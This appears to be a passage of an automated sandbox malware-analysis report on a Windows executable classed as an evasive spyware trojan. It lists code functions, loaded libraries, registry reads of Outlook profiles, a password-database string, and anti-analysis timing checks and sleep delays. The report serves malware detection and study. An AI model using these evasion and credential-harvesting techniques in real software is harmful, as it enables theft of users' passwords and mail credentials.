            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BDEF32_2_354BDEF3
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B6EA32_2_354B6EA3
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B6EA02_2_354B6EA0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BB9442_2_354BB944
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BC1F22_2_354BC1F2
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354B78482_2_354B7848
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BF0532_2_354BF053
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BB07F2_2_354BB07F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BB0932_2_354BB093
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BE34B2_2_354BE34B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BEBF72_2_354BEBF7
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BAAEA2_2_354BAAEA
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_354BDA9B2_2_354BDA9B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9BDF02_2_35A9BDF0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A99D102_2_35A99D10
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A914002_2_35A91400
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A996C82_2_35A996C8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A986502_2_35A98650
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9A9B02_2_35A9A9B0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9A3602_2_35A9A360
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9BA972_2_35A9BA97
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A94DB02_2_35A94DB0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9BDE12_2_35A9BDE1
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A99D002_2_35A99D00
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A925602_2_35A92560
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A974B82_2_35A974B8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A91CB02_2_35A91CB0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A974C82_2_35A974C8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A96C182_2_35A96C18
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A90FA82_2_35A90FA8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A967B02_2_35A967B0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9AFF82_2_35A9AFF8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9AFF72_2_35A9AFF7
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A967C02_2_35A967C0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A95F102_2_35A95F10
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A93F602_2_35A93F60
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A93F702_2_35A93F70
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A936C02_2_35A936C0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A92E102_2_35A92E10
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A956602_2_35A95660
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A956502_2_35A95650
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9A9A02_2_35A9A9A0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A929B82_2_35A929B8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9F1202_2_35A9F120
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A9F1302_2_35A9F130
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A921082_2_35A92108
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A948202_2_35A94820
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A900372_2_35A90037
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A970612_2_35A97061
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A970702_2_35A97070
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A900402_2_35A90040
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A918582_2_35A91858
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A913F02_2_35A913F0
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A943C82_2_35A943C8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A93B182_2_35A93B18
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A963682_2_35A96368
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A97B632_2_35A97B63
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A95AB82_2_35A95AB8
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A952082_2_35A95208
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A952072_2_35A95207
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35A932682_2_35A93268
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35DFD6082_2_35DFD608
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_35DF83282_2_35DF8328
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: String function: 00402C41 appears 51 times
            Source: WGi85dsMNp.exe, 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe
            Source: WGi85dsMNp.exe, 00000002.00000002.3941594169.0000000032AC7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs WGi85dsMNp.exe
            Source: WGi85dsMNp.exe, 00000002.00000000.2174421272.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe
            Source: WGi85dsMNp.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs WGi85dsMNp.exe
            Source: WGi85dsMNp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004034A5
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeMutant created: NULL
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile created: C:\Users\user\AppData\Local\Temp\nsdC34B.tmpJump to behavior
            Source: WGi85dsMNp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: WGi85dsMNp.exe, 00000002.00000002.3942746552.0000000033CED000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DE4000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DD8000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DB5000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DA5000.00000004.00000800.00020000.00000000.sdmp, WGi85dsMNp.exe, 00000002.00000002.3941954110.0000000032DC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: WGi85dsMNp.exeVirustotal: Detection: 76%
            Source: WGi85dsMNp.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile read: C:\Users\user\Desktop\WGi85dsMNp.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess created: C:\Users\user\Desktop\WGi85dsMNp.exe "C:\Users\user\Desktop\WGi85dsMNp.exe"Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: WGi85dsMNp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2180305657.0000000003349000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_6F941B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F941B5F
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeFile created: C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeAPI/Special instruction interceptor: Address: 3A436CE
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeAPI/Special instruction interceptor: Address: 1EE36CE
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRDTSC instruction interceptor: First address: 3A0B40B second address: 3A0B40B instructions: 0x00000000 rdtsc 0x00000002 cmp cx, 77B0h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FED40D50FEDh 0x0000000b test eax, 0AF5C948h 0x00000010 inc ebp 0x00000011 test dx, bx 0x00000014 inc ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeRDTSC instruction interceptor: First address: 1EAB40B second address: 1EAB40B instructions: 0x00000000 rdtsc 0x00000002 cmp cx, 77B0h 0x00000007 cmp ebx, ecx 0x00000009 jc 00007FED40C5437Dh 0x0000000b test eax, 0AF5C948h 0x00000010 inc ebp 0x00000011 test dx, bx 0x00000014 inc ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeMemory allocated: 32CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeMemory allocated: 32BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeAPI coverage: 3.4 %
            Source: C:\Users\user\Desktop\WGi85dsMNp.exe TID: 6720Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exe TID: 6720Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_0040672B FindFirstFileW,FindClose,2_2_0040672B
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeCode function: 2_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405AFA
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\WGi85dsMNp.exeThread delayed: delay time: 600000Jump to behavior
